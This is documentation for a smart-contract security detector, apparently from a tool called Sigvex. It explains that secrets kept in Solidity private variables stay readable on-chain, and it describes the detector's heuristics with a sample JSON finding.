Private Data Exposure
Detects contracts storing sensitive data in private or internal state variables, which remain readable on-chain despite the visibility modifier.
Private Data Exposure
Overview
The private data detector identifies contracts that store sensitive information (passwords, secret keys, private configuration) in state variables marked as private or internal. On the EVM, all storage is publicly readable via eth_getStorageAt regardless of Solidity visibility modifiers. The private keyword only prevents other contracts from reading the variable; it does not provide confidentiality.
Why This Is an Issue
Developers sometimes store API keys, passwords, or access control secrets in private variables, assuming they are hidden. Any observer can read these values directly from storage, bypassing the Solidity visibility restriction entirely.
Detection Methodology
- Storage slot analysis: Identifies storage variables from SLOAD/SSTORE patterns.
- Value classification: Uses heuristics to classify stored values as potentially sensitive (constant-length hashes, encoded strings, values set only in constructor).
- Access pattern analysis: Flags variables that are written once (initialization) and only read in comparison operations (password check pattern).
Examples
Sample Sigvex Output
{
"detector_id": "private-data",
"severity": "low",
"confidence": 0.65,
"description": "Storage slot 2 is written once in the constructor and compared against function input in authenticate(). This pattern suggests a stored secret used for authentication, which is publicly readable via eth_getStorageAt.",
"location": { "function": "authenticate(bytes32)", "offset": 44 }
}Related Detectors
- Access Control — access control issues
- Weak Randomness — predictable values